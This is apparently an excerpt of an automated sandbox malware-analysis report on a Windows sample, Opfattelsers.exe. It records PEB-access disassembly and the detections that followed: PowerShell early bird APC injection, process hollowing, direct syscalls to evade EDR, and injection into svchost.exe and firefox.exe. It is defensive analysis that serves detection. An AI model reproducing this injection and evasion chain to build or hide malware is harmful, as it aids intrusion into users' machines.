Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7D1876 mov eax, dword ptr fs:[00000030h]	6_2_1F7D1876
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85F889 mov eax, dword ptr fs:[00000030h]	6_2_1F85F889
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F83B890 mov eax, dword ptr fs:[00000030h]	6_2_1F83B890
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F83B890 mov eax, dword ptr fs:[00000030h]	6_2_1F83B890
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79D860 mov eax, dword ptr fs:[00000030h]	6_2_1F79D860
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85D8B0 mov eax, dword ptr fs:[00000030h]	6_2_1F85D8B0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85D8B0 mov eax, dword ptr fs:[00000030h]	6_2_1F85D8B0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E1843 mov eax, dword ptr fs:[00000030h]	6_2_1F7E1843
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E1843 mov eax, dword ptr fs:[00000030h]	6_2_1F7E1843
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E1843 mov eax, dword ptr fs:[00000030h]	6_2_1F7E1843
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E1843 mov eax, dword ptr fs:[00000030h]	6_2_1F7E1843
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E1843 mov eax, dword ptr fs:[00000030h]	6_2_1F7E1843
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E1843 mov eax, dword ptr fs:[00000030h]	6_2_1F7E1843
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7D182A mov eax, dword ptr fs:[00000030h]	6_2_1F7D182A
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7D3820 mov eax, dword ptr fs:[00000030h]	6_2_1F7D3820
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F8298E7 mov eax, dword ptr fs:[00000030h]	6_2_1F8298E7
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85F8F8 mov eax, dword ptr fs:[00000030h]	6_2_1F85F8F8
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7C9803 mov eax, dword ptr fs:[00000030h]	6_2_1F7C9803
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F841800 mov eax, dword ptr fs:[00000030h]	6_2_1F841800
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F841800 mov eax, dword ptr fs:[00000030h]	6_2_1F841800
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85F80A mov eax, dword ptr fs:[00000030h]	6_2_1F85F80A
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B38E0 mov eax, dword ptr fs:[00000030h]	6_2_1F7B38E0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B38E0 mov eax, dword ptr fs:[00000030h]	6_2_1F7B38E0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B38E0 mov eax, dword ptr fs:[00000030h]	6_2_1F7B38E0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F82D820 mov ecx, dword ptr fs:[00000030h]	6_2_1F82D820
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F82D820 mov eax, dword ptr fs:[00000030h]	6_2_1F82D820
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F82D820 mov eax, dword ptr fs:[00000030h]	6_2_1F82D820
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A78D9 mov eax, dword ptr fs:[00000030h]	6_2_1F7A78D9
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A78D9 mov eax, dword ptr fs:[00000030h]	6_2_1F7A78D9
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A38C4 mov eax, dword ptr fs:[00000030h]	6_2_1F7A38C4
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A38C4 mov eax, dword ptr fs:[00000030h]	6_2_1F7A38C4
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A38C4 mov eax, dword ptr fs:[00000030h]	6_2_1F7A38C4
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A38C4 mov eax, dword ptr fs:[00000030h]	6_2_1F7A38C4
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A38C4 mov eax, dword ptr fs:[00000030h]	6_2_1F7A38C4
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A38C4 mov eax, dword ptr fs:[00000030h]	6_2_1F7A38C4
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A38C4 mov eax, dword ptr fs:[00000030h]	6_2_1F7A38C4
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85F78A mov eax, dword ptr fs:[00000030h]	6_2_1F85F78A
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79B765 mov eax, dword ptr fs:[00000030h]	6_2_1F79B765
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79B765 mov eax, dword ptr fs:[00000030h]	6_2_1F79B765
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79B765 mov eax, dword ptr fs:[00000030h]	6_2_1F79B765
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79B765 mov eax, dword ptr fs:[00000030h]	6_2_1F79B765
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F8297A9 mov eax, dword ptr fs:[00000030h]	6_2_1F8297A9
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F82F7AF mov eax, dword ptr fs:[00000030h]	6_2_1F82F7AF
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F82F7AF mov eax, dword ptr fs:[00000030h]	6_2_1F82F7AF
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F82F7AF mov eax, dword ptr fs:[00000030h]	6_2_1F82F7AF
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F82F7AF mov eax, dword ptr fs:[00000030h]	6_2_1F82F7AF
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F82F7AF mov eax, dword ptr fs:[00000030h]	6_2_1F82F7AF
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F8737B6 mov eax, dword ptr fs:[00000030h]	6_2_1F8737B6
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85D7B0 mov eax, dword ptr fs:[00000030h]	6_2_1F85D7B0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85D7B0 mov eax, dword ptr fs:[00000030h]	6_2_1F85D7B0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A973A mov eax, dword ptr fs:[00000030h]	6_2_1F7A973A
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A973A mov eax, dword ptr fs:[00000030h]	6_2_1F7A973A
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F799730 mov eax, dword ptr fs:[00000030h]	6_2_1F799730
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F799730 mov eax, dword ptr fs:[00000030h]	6_2_1F799730
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7D5734 mov eax, dword ptr fs:[00000030h]	6_2_1F7D5734
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A3720 mov eax, dword ptr fs:[00000030h]	6_2_1F7A3720
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7BF720 mov eax, dword ptr fs:[00000030h]	6_2_1F7BF720
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7BF720 mov eax, dword ptr fs:[00000030h]	6_2_1F7BF720
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7BF720 mov eax, dword ptr fs:[00000030h]	6_2_1F7BF720
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7DF71F mov eax, dword ptr fs:[00000030h]	6_2_1F7DF71F
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7DF71F mov eax, dword ptr fs:[00000030h]	6_2_1F7DF71F
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A5702 mov eax, dword ptr fs:[00000030h]	6_2_1F7A5702
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A5702 mov eax, dword ptr fs:[00000030h]	6_2_1F7A5702
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A7703 mov eax, dword ptr fs:[00000030h]	6_2_1F7A7703
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7AD7E0 mov ecx, dword ptr fs:[00000030h]	6_2_1F7AD7E0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85F72E mov eax, dword ptr fs:[00000030h]	6_2_1F85F72E
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F86972B mov eax, dword ptr fs:[00000030h]	6_2_1F86972B
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A57C0 mov eax, dword ptr fs:[00000030h]	6_2_1F7A57C0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A57C0 mov eax, dword ptr fs:[00000030h]	6_2_1F7A57C0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A57C0 mov eax, dword ptr fs:[00000030h]	6_2_1F7A57C0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F87B73C mov eax, dword ptr fs:[00000030h]	6_2_1F87B73C
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F87B73C mov eax, dword ptr fs:[00000030h]	6_2_1F87B73C
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F87B73C mov eax, dword ptr fs:[00000030h]	6_2_1F87B73C
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F87B73C mov eax, dword ptr fs:[00000030h]	6_2_1F87B73C
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79F7BA mov eax, dword ptr fs:[00000030h]	6_2_1F79F7BA
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79F7BA mov eax, dword ptr fs:[00000030h]	6_2_1F79F7BA
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79F7BA mov eax, dword ptr fs:[00000030h]	6_2_1F79F7BA
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79F7BA mov eax, dword ptr fs:[00000030h]	6_2_1F79F7BA
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79F7BA mov eax, dword ptr fs:[00000030h]	6_2_1F79F7BA
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79F7BA mov eax, dword ptr fs:[00000030h]	6_2_1F79F7BA
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79F7BA mov eax, dword ptr fs:[00000030h]	6_2_1F79F7BA
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79F7BA mov eax, dword ptr fs:[00000030h]	6_2_1F79F7BA
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79F7BA mov eax, dword ptr fs:[00000030h]	6_2_1F79F7BA
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7CD7B0 mov eax, dword ptr fs:[00000030h]	6_2_1F7CD7B0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F873749 mov eax, dword ptr fs:[00000030h]	6_2_1F873749
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84375F mov eax, dword ptr fs:[00000030h]	6_2_1F84375F
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84375F mov eax, dword ptr fs:[00000030h]	6_2_1F84375F
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84375F mov eax, dword ptr fs:[00000030h]	6_2_1F84375F
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84375F mov eax, dword ptr fs:[00000030h]	6_2_1F84375F
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84375F mov eax, dword ptr fs:[00000030h]	6_2_1F84375F
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F82368C mov eax, dword ptr fs:[00000030h]	6_2_1F82368C
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F82368C mov eax, dword ptr fs:[00000030h]	6_2_1F82368C
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F82368C mov eax, dword ptr fs:[00000030h]	6_2_1F82368C
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F82368C mov eax, dword ptr fs:[00000030h]	6_2_1F82368C
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7D9660 mov eax, dword ptr fs:[00000030h]	6_2_1F7D9660
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7D9660 mov eax, dword ptr fs:[00000030h]	6_2_1F7D9660
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85F6C7 mov eax, dword ptr fs:[00000030h]	6_2_1F85F6C7
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F8616CC mov eax, dword ptr fs:[00000030h]	6_2_1F8616CC
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F8616CC mov eax, dword ptr fs:[00000030h]	6_2_1F8616CC
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F8616CC mov eax, dword ptr fs:[00000030h]	6_2_1F8616CC
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F8616CC mov eax, dword ptr fs:[00000030h]	6_2_1F8616CC
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79F626 mov eax, dword ptr fs:[00000030h]	6_2_1F79F626
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79F626 mov eax, dword ptr fs:[00000030h]	6_2_1F79F626
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79F626 mov eax, dword ptr fs:[00000030h]	6_2_1F79F626
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79F626 mov eax, dword ptr fs:[00000030h]	6_2_1F79F626
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79F626 mov eax, dword ptr fs:[00000030h]	6_2_1F79F626
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79F626 mov eax, dword ptr fs:[00000030h]	6_2_1F79F626
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79F626 mov eax, dword ptr fs:[00000030h]	6_2_1F79F626
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79F626 mov eax, dword ptr fs:[00000030h]	6_2_1F79F626
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79F626 mov eax, dword ptr fs:[00000030h]	6_2_1F79F626
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A3616 mov eax, dword ptr fs:[00000030h]	6_2_1F7A3616

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Early bird code injection technique detected

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	NtResumeThread: Direct from: 0x773836AC	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	NtMapViewOfSection: Direct from: 0x77382D1C	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	NtWriteVirtualMemory: Direct from: 0x77382E3C	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	NtProtectVirtualMemory: Direct from: 0x77382F9C	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	NtSetInformationThread: Direct from: 0x773763F9	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	NtCreateMutant: Direct from: 0x773835CC	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	NtNotifyChangeKey: Direct from: 0x77383C2C	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	NtSetInformationProcess: Direct from: 0x77382C5C	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	NtCreateUserProcess: Direct from: 0x7738371C	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	NtQueryInformationProcess: Direct from: 0x77382C26	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	NtResumeThread: Direct from: 0x77382FBC	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	NtWriteVirtualMemory: Direct from: 0x7738490C	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	NtOpenKeyEx: Direct from: 0x77383C9C	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	NtReadFile: Direct from: 0x77382ADC	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	NtAllocateVirtualMemory: Direct from: 0x77382BFC	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	NtDelayExecution: Direct from: 0x77382DDC	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	NtQuerySystemInformation: Direct from: 0x77382DFC	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	NtOpenSection: Direct from: 0x77382E0C	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	NtQueryVolumeInformationFile: Direct from: 0x77382F2C	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	NtQuerySystemInformation: Direct from: 0x773848CC	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	NtCreateKey: Direct from: 0x77382C6C	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	NtReadVirtualMemory: Direct from: 0x77382E8C	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	NtAllocateVirtualMemory: Direct from: 0x773848EC	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	NtQueryAttributesFile: Direct from: 0x77382E6C	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	NtSetInformationThread: Direct from: 0x77382B4C	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	NtQueryInformationToken: Direct from: 0x77382CAC	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	NtOpenKeyEx: Direct from: 0x77382B9C	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	NtQueryValueKey: Direct from: 0x77382BEC	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	NtDeviceIoControlFile: Direct from: 0x77382AEC	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	NtCreateFile: Direct from: 0x77382FEC	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	NtOpenFile: Direct from: 0x77382DCC	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	NtProtectVirtualMemory: Direct from: 0x77377B2E	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Section loaded: NULL target: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\svchost.exe

Thread register set: target process: 2032

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe

Sample uses process hollowing technique

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Section unmapped: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe base address: 400000

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe base: 1660000

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe "C:\Users\user\AppData\Local\Temp\Opfattelsers.exe"	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\SysWOW64\svchost.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: PxuyeSuijNdsM.exe, 00000008.00000000.2949932754.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, PxuyeSuijNdsM.exe, 00000008.00000002.3360735341.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: PxuyeSuijNdsM.exe, 00000008.00000000.2949932754.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, PxuyeSuijNdsM.exe, 00000008.00000002.3360735341.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: PxuyeSuijNdsM.exe, 00000008.00000000.2949932754.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, PxuyeSuijNdsM.exe, 00000008.00000002.3360735341.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: PxuyeSuijNdsM.exe, 00000008.00000000.2949932754.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, PxuyeSuijNdsM.exe, 00000008.00000002.3360735341.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
